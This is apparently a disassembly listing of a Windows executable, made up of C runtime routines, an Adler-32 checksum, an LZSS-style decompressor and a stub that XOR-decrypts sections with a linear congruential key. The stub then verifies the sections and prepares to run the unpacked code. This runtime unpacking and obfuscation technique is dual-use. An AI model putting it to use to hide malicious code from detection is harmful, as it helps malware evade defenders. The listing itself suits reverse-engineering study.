loc_4D1C10: ; CODE XREF: sub_4D1A80+AD�j
; sub_4D1A80+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4D1C22: ; CODE XREF: sub_4D1A80+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4D1D90
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4D1C56
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4D1C56: ; CODE XREF: sub_4D1A80+1C2�j
cmp ebx, edi
jz short loc_4D1C0E
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E3034 ;; LCMapStringW
test eax, eax
jz short loc_4D1C0E
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4D1C7D
push edi
push edi
jmp short loc_4D1C83
; ---------------------------------------------------------------------------
loc_4D1C7D: ; CODE XREF: sub_4D1A80+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4D1C83: ; CODE XREF: sub_4D1A80+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_4E3040 ;; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_4D1C0E
loc_4D1C9D: ; CODE XREF: sub_4D1A80+165�j
; sub_4D1A80+188�j
mov eax, esi
jmp loc_4D1C10
sub_4D1A80 endp
; =============== S U B R O U T I N E =======================================
sub_4D1CA4 proc near ; CODE XREF: sub_4D1A80+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4D1CC1
loc_4D1CB4: ; CODE XREF: sub_4D1CA4+1B�j
cmp byte ptr [eax], 0
jz short loc_4D1CC1
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_4D1CB4
loc_4D1CC1: ; CODE XREF: sub_4D1CA4+E�j
; sub_4D1CA4+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4D1CCC
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4D1CCC: ; CODE XREF: sub_4D1CA4+21�j
mov eax, edx
retn
sub_4D1CA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1CCF proc near ; CODE XREF: sub_4D186E+46�p
; sub_4D19EA+17�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_4D1CED
mov ecx, ds:off_4E6450
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4D1D3F
; ---------------------------------------------------------------------------
loc_4D1CED: ; CODE XREF: sub_4D1CCF+10�j
mov ecx, eax
push esi
mov esi, ds:off_4E6450
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_4D1D12
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_4D1D1B
; ---------------------------------------------------------------------------
loc_4D1D12: ; CODE XREF: sub_4D1CCF+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_4D1D1B: ; CODE XREF: sub_4D1CCF+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_4D1DBF
add esp, 1Ch
test eax, eax
jnz short loc_4D1D3B
leave
retn
; ---------------------------------------------------------------------------
loc_4D1D3B: ; CODE XREF: sub_4D1CCF+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_4D1D3F: ; CODE XREF: sub_4D1CCF+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_4D1CCF endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_4D1D69
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4D1D69: ; CODE XREF: _4:004D1D5E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4D1D90 proc near ; CODE XREF: sub_4D1A80+FD�p
; sub_4D1A80+1B1�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4D1DB0
loc_4D1D9C: ; CODE XREF: sub_4D1D90+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4D1D9C
loc_4D1DB0: ; CODE XREF: sub_4D1D90+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4D1D90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1DBF proc near ; CODE XREF: sub_4D1CCF+5E�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3B20
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4EB10C
xor ebx, ebx
cmp eax, ebx
jnz short loc_4D1E2E
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4E3B00
push esi
call ds:dword_4E3048 ;; GetStringTypeW
test eax, eax
jz short loc_4D1E0C
mov eax, esi
jmp short loc_4D1E29
; ---------------------------------------------------------------------------
loc_4D1E0C: ; CODE XREF: sub_4D1DBF+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4E3AFC
push esi
push ebx
call ds:dword_4E3030 ;; GetStringTypeA
test eax, eax
jz loc_4D1EF4
push 2
pop eax
loc_4D1E29: ; CODE XREF: sub_4D1DBF+4B�j
mov ds:dword_4EB10C, eax
loc_4D1E2E: ; CODE XREF: sub_4D1DBF+2F�j
cmp eax, 2
jnz short loc_4D1E57
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_4D1E3F
mov eax, ds:dword_4EB0F4
loc_4D1E3F: ; CODE XREF: sub_4D1DBF+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_4E3030 ;; GetStringTypeA
jmp loc_4D1EF6
; ---------------------------------------------------------------------------
loc_4D1E57: ; CODE XREF: sub_4D1DBF+72�j
cmp eax, 1
jnz loc_4D1EF4
cmp [ebp+arg_10], ebx
jnz short loc_4D1E6D
mov eax, ds:dword_4EB104
mov [ebp+arg_10], eax
loc_4D1E6D: ; CODE XREF: sub_4D1DBF+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_4E3044 ;; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_4D1EF4
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4D1D90
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4D1F10
add esp, 0Ch
jmp short loc_4D1EC3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_4D1EC3: ; CODE XREF: sub_4D1DBF+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_4D1EF4
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_4E3044 ;; MultiByteToWideChar
cmp eax, ebx
jz short loc_4D1EF4
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_4E3048 ;; GetStringTypeW
jmp short loc_4D1EF6
; ---------------------------------------------------------------------------
loc_4D1EF4: ; CODE XREF: sub_4D1DBF+61�j
; sub_4D1DBF+9B�j ...
xor eax, eax
loc_4D1EF6: ; CODE XREF: sub_4D1DBF+93�j
; sub_4D1DBF+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4D1DBF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4D1F10 proc near ; CODE XREF: sub_4D1DBF+EF�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4D1F63
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4D1F57
neg ecx
and ecx, 3
jz short loc_4D1F39
sub edx, ecx
loc_4D1F33: ; CODE XREF: sub_4D1F10+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4D1F33
loc_4D1F39: ; CODE XREF: sub_4D1F10+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4D1F57
rep stosd
test edx, edx
jz short loc_4D1F5D
loc_4D1F57: ; CODE XREF: sub_4D1F10+18�j
; sub_4D1F10+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4D1F57
loc_4D1F5D: ; CODE XREF: sub_4D1F10+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4D1F63: ; CODE XREF: sub_4D1F10+A�j
mov eax, [esp+arg_0]
retn
sub_4D1F10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4D1F68 proc near ; CODE XREF: sub_4D1454+13�p
jmp ds:dword_4E303C
sub_4D1F68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1F6E proc near ; CODE XREF: sub_4D22E0+183�p
; sub_4D22E0+361�p
; DATA XREF: ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, edi
and esi, 0FFFFh
shr edi, 10h
test ecx, ecx
jnz short loc_4D1F90
push 1
pop eax
jmp loc_4D2083
; ---------------------------------------------------------------------------
loc_4D1F90: ; CODE XREF: sub_4D1F6E+18�j
cmp [ebp+arg_8], 0
jbe loc_4D207C
push ebx
loc_4D1F9B: ; CODE XREF: sub_4D1F6E+107�j
mov edx, 15B0h
cmp [ebp+arg_8], edx
jnb short loc_4D1FA8
mov edx, [ebp+arg_8]
loc_4D1FA8: ; CODE XREF: sub_4D1F6E+35�j
sub [ebp+arg_8], edx
cmp edx, 10h
jl loc_4D204B
mov eax, edx
shr eax, 4
mov ebx, eax
neg ebx
shl ebx, 4
add edx, ebx
loc_4D1FC2: ; CODE XREF: sub_4D1F6E+D7�j
movzx ebx, byte ptr [ecx]
add esi, ebx
movzx ebx, byte ptr [ecx+1]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+2]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+3]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+4]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+5]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+6]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+7]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+8]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+9]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ah]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Bh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ch]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Dh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Eh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Fh]
add edi, esi
add esi, ebx
add edi, esi
add ecx, 10h
dec eax
jnz loc_4D1FC2
loc_4D204B: ; CODE XREF: sub_4D1F6E+40�j
test edx, edx
jz short loc_4D205A
loc_4D204F: ; CODE XREF: sub_4D1F6E+EA�j
movzx eax, byte ptr [ecx]
add esi, eax
inc ecx
add edi, esi
dec edx
jnz short loc_4D204F
loc_4D205A: ; CODE XREF: sub_4D1F6E+DF�j
mov ebx, 0FFF1h
mov eax, esi
xor edx, edx
mov esi, ebx
div esi
mov eax, edi
mov esi, edx
xor edx, edx
div ebx
cmp [ebp+arg_8], 0
mov edi, edx
ja loc_4D1F9B
pop ebx
loc_4D207C: ; CODE XREF: sub_4D1F6E+26�j
mov eax, edi
shl eax, 10h
or eax, esi
loc_4D2083: ; CODE XREF: sub_4D1F6E+1D�j
pop edi
pop esi
pop ebp
retn
sub_4D1F6E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D2090 proc near ; CODE XREF: sub_4D22E0+15E�p
; sub_4D22E0+33C�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_1C], ecx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
mov [edx+4], eax
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
mov [ecx+8], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov edx, [ebp+var_1C]
mov dword ptr [edx+14h], 0
mov eax, [ebp+var_1C]
mov dword ptr [eax+10h], 0
mov [ebp+var_10], 0
jmp short loc_4D20E2
; ---------------------------------------------------------------------------
loc_4D20D9: ; CODE XREF: sub_4D2090+65�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_4D20E2: ; CODE XREF: sub_4D2090+47�j
cmp [ebp+var_10], 0FEEh
jge short loc_4D20F7
mov edx, [ebp+var_1C]
add edx, [ebp+var_10]
mov byte ptr [edx+18h], 20h
jmp short loc_4D20D9
; ---------------------------------------------------------------------------
loc_4D20F7: ; CODE XREF: sub_4D2090+59�j
mov [ebp+var_8], 0FEEh
mov [ebp+var_4], 0
loc_4D2105: ; CODE XREF: sub_4D2090:loc_4D2236�j
mov eax, [ebp+var_4]
shr eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
and ecx, 100h
test ecx, ecx
jnz short loc_4D2139
mov ecx, [ebp+var_1C]
call sub_4D2250
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_4D2130
jmp loc_4D223B
; ---------------------------------------------------------------------------
loc_4D2130: ; CODE XREF: sub_4D2090+99�j
mov edx, [ebp+var_C]
or dh, 0FFh
mov [ebp+var_4], edx
loc_4D2139: ; CODE XREF: sub_4D2090+88�j
mov eax, [ebp+var_4]
and eax, 1
test eax, eax
jz short loc_4D218A
mov ecx, [ebp+var_1C]
call sub_4D2250
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_4D2159
jmp loc_4D223B
; ---------------------------------------------------------------------------
loc_4D2159: ; CODE XREF: sub_4D2090+C2�j
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_4D2290
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp loc_4D2236
; ---------------------------------------------------------------------------
loc_4D218A: ; CODE XREF: sub_4D2090+B1�j
mov ecx, [ebp+var_1C]
call sub_4D2250
mov [ebp+var_10], eax
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_4D21A0
jmp loc_4D223B
; ---------------------------------------------------------------------------
loc_4D21A0: ; CODE XREF: sub_4D2090+109�j
mov ecx, [ebp+var_1C]
call sub_4D2250
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_4D21B6
jmp loc_4D223B
; ---------------------------------------------------------------------------
loc_4D21B6: ; CODE XREF: sub_4D2090+11F�j
mov edx, [ebp+var_14]
and edx, 0F0h
shl edx, 4
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_14]
and ecx, 0Fh
add ecx, 2
mov [ebp+var_14], ecx
mov [ebp+var_18], 0
jmp short loc_4D21E8
; ---------------------------------------------------------------------------
loc_4D21DF: ; CODE XREF: sub_4D2090+1A4�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_4D21E8: ; CODE XREF: sub_4D2090+14D�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jg short loc_4D2236
mov ecx, [ebp+var_10]
add ecx, [ebp+var_18]
and ecx, 0FFFh
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+ecx+18h]
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_4D2290
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp short loc_4D21DF
; ---------------------------------------------------------------------------
loc_4D2236: ; CODE XREF: sub_4D2090+F5�j
; sub_4D2090+15E�j
jmp loc_4D2105
; ---------------------------------------------------------------------------
loc_4D223B: ; CODE XREF: sub_4D2090+9B�j
; sub_4D2090+C4�j ...
mov edx, [ebp+var_1C]
mov eax, [edx+10h]
mov esp, ebp
pop ebp
retn 10h
sub_4D2090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D2250 proc near ; CODE XREF: sub_4D2090+8D�p
; sub_4D2090+B6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+14h]
cmp edx, [ecx+8]
jb short loc_4D226A
or eax, 0FFFFFFFFh
jmp short loc_4D228B
; ---------------------------------------------------------------------------
loc_4D226A: ; CODE XREF: sub_4D2250+13�j
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
mov eax, [edx+14h]
xor edx, edx
mov dl, [ecx+eax]
mov eax, edx
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
add edx, 1
mov ecx, [ebp+var_4]
mov [ecx+14h], edx
loc_4D228B: ; CODE XREF: sub_4D2250+18�j
mov esp, ebp
pop ebp
retn
sub_4D2250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D2290 proc near ; CODE XREF: sub_4D2090+CF�p
; sub_4D2090+17E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+10h]
cmp edx, [ecx+0Ch]
jb short loc_4D22AC
jmp short loc_4D22CD
; ---------------------------------------------------------------------------
loc_4D22AC: ; CODE XREF: sub_4D2290+18�j
mov eax, [ebp+var_4]
mov ecx, [eax+4]
mov edx, [ebp+var_4]
mov eax, [edx+10h]
mov dl, byte ptr [ebp+var_8]
mov [ecx+eax], dl
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx+10h], ecx
loc_4D22CD: ; CODE XREF: sub_4D2290+1A�j
mov esp, ebp
pop ebp
retn
sub_4D2290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D22E0 proc near ; CODE XREF: _4:loc_4D2700�p
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 70h
push esi
push edi
push 0
call ds:dword_4E3014 ;; GetModuleHandleA
mov [ebp+var_18], eax
push 0D440h
push 40h
call ds:dword_4E3010 ;; LocalAlloc
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
sub eax, 3FAh
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
sub ecx, 4
mov [ebp+var_10], ecx
mov [ebp+var_1C], 0
mov [ebp+var_44], 1
mov [ebp+var_30], 0
mov [ebp+var_3C], offset aBarier ; "BARIER"
loc_4D2333: ; CODE XREF: sub_4D22E0+98�j
; sub_4D22E0+A0�j
mov edx, [ebp+var_10]
mov eax, [edx]
imul eax, 28h
mov ecx, [ebp+var_4]
add ecx, eax
mov edx, [ebp+var_44]
imul edx, 28h
sub ecx, edx
mov [ebp+var_30], ecx
mov eax, [ebp+var_44]
add eax, 1
mov [ebp+var_44], eax
mov ecx, [ebp+var_30]
mov edx, [ebp+var_18]
add edx, [ecx+0Ch]
mov [ebp+var_40], edx
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov edx, [ebp+var_30]
add ecx, [edx+8]
mov [ebp+var_2C], ecx
mov eax, [ebp+var_40]
cmp eax, [ebp+var_3C]
ja short loc_4D2333
mov ecx, [ebp+var_3C]
cmp ecx, [ebp+var_2C]
jnb short loc_4D2333
mov edx, [ebp+var_40]
mov [ebp+var_20], edx
jmp short loc_4D2393
; ---------------------------------------------------------------------------
loc_4D238A: ; CODE XREF: sub_4D22E0+DA�j
mov eax, [ebp+var_40]
add eax, 4
mov [ebp+var_40], eax
loc_4D2393: ; CODE XREF: sub_4D22E0+A8�j
mov ecx, [ebp+var_40]
cmp ecx, [ebp+var_2C]
jnb short loc_4D23BC
mov edx, [ebp+var_20]
imul edx, 19660Dh
add edx, 3C6EF375h
mov [ebp+var_20], edx
mov eax, [ebp+var_40]
mov ecx, [eax]
xor ecx, [ebp+var_20]
mov edx, [ebp+var_40]
mov [edx], ecx
jmp short loc_4D238A
; ---------------------------------------------------------------------------
loc_4D23BC: ; CODE XREF: sub_4D22E0+B9�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
mov eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_38], edx
mov eax, [ebp+var_24]
mov ecx, [eax+8]
mov [ebp+var_34], ecx
mov edx, [ebp+var_38]
push edx
push 40h
call ds:dword_4E3010 ;; LocalAlloc
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D2400
cmp [ebp+var_38], 10000h
jbe short loc_4D2411
loc_4D2400: ; CODE XREF: sub_4D22E0+115�j
push 0
push 0
push 0
push 0EF0000FEh
call ds:dword_4E300C ;; RaiseException
loc_4D2411: ; CODE XREF: sub_4D22E0+11E�j
mov ecx, [ebp+var_38]
mov esi, [ebp+var_24]
add esi, 0Ch
mov edi, [ebp+var_1C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_38]
push eax
mov ecx, [ebp+var_1C]
push ecx
mov ecx, [ebp+var_8]
call sub_4D2090
cmp eax, [ebp+var_28]
jz short loc_4D2459
push 0
push 0
push 0
push 0EF0000F8h
call ds:dword_4E300C ;; RaiseException
loc_4D2459: ; CODE XREF: sub_4D22E0+166�j
mov edx, [ebp+var_28]
push edx
mov eax, [ebp+var_24]
push eax
push 0
call sub_4D1F6E
add esp, 0Ch
cmp eax, [ebp+var_34]
jz short loc_4D2481
push 0
push 0
push 0
push 0EF0000FAh
call ds:dword_4E300C ;; RaiseException
loc_4D2481: ; CODE XREF: sub_4D22E0+18E�j
mov ecx, [ebp+var_1C]
push ecx
call ds:dword_4E3008 ;; LocalFree
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4E3014 ;; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4D24B0
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4E300C ;; RaiseException
loc_4D24B0: ; CODE XREF: sub_4D22E0+1BD�j
push offset aFlushinstructi ; "FlushInstructionCache"
mov edx, [ebp+var_C]
push edx
call ds:dword_4E3004 ;; GetProcAddress
mov ds:dword_4E6670, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_4E3004 ;; GetProcAddress
mov [ebp+var_14], eax
cmp ds:dword_4E6670, 0
jnz short loc_4D24F0
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_4E300C ;; RaiseException
loc_4D24F0: ; CODE XREF: sub_4D22E0+1FD�j
call [ebp+var_14]
mov ds:dword_4E668C, eax
mov [ebp+var_48], 0
mov [ebp+var_68], 3
mov [ebp+var_58], 0
loc_4D250D: ; CODE XREF: sub_4D22E0+272�j
; sub_4D22E0+27A�j
mov ecx, [ebp+var_10]
mov edx, [ecx]
imul edx, 28h
mov eax, [ebp+var_4]
add eax, edx
mov ecx, [ebp+var_68]
imul ecx, 28h
sub eax, ecx
mov [ebp+var_58], eax
mov edx, [ebp+var_68]
add edx, 1
mov [ebp+var_68], edx
mov eax, [ebp+var_58]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_64], ecx
mov edx, [ebp+var_58]
mov eax, [ebp+var_18]
add eax, [edx+0Ch]
mov ecx, [ebp+var_58]
add eax, [ecx+8]
mov [ebp+var_54], eax
mov edx, [ebp+var_64]
cmp edx, [ebp+arg_0]
jnb short loc_4D250D
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_54]
jnb short loc_4D250D
mov ecx, [ebp+arg_0]
mov [ebp+var_64], ecx
mov edx, [ebp+var_64]
mov [ebp+var_4C], edx
mov eax, [ebp+var_64]
add eax, 0Ch
and al, 0FCh
mov [ebp+var_64], eax
jmp short loc_4D257E
; ---------------------------------------------------------------------------
loc_4D2575: ; CODE XREF: sub_4D22E0+2C4�j
mov ecx, [ebp+var_64]
add ecx, 4
mov [ebp+var_64], ecx
loc_4D257E: ; CODE XREF: sub_4D22E0+293�j
mov edx, [ebp+var_64]
cmp edx, [ebp+var_54]
jnb short loc_4D25A6
mov eax, [ebp+var_4C]
imul eax, 19660Dh
add eax, 3C6EF375h
mov [ebp+var_4C], eax
mov ecx, [ebp+var_64]
mov edx, [ecx]
xor edx, [ebp+var_4C]
mov eax, [ebp+var_64]
mov [eax], edx
jmp short loc_4D2575
; ---------------------------------------------------------------------------
loc_4D25A6: ; CODE XREF: sub_4D22E0+2A4�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [ebp+var_50], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ebp+var_60], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
mov [ebp+var_5C], eax
mov ecx, [ebp+var_60]
push ecx
push 40h
call ds:dword_4E3010 ;; LocalAlloc
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_4D25DE
cmp [ebp+var_60], 10000h
jbe short loc_4D25EF
loc_4D25DE: ; CODE XREF: sub_4D22E0+2F3�j
push 0
push 0
push 0
push 0EF0000FFh
call ds:dword_4E300C ;; RaiseException
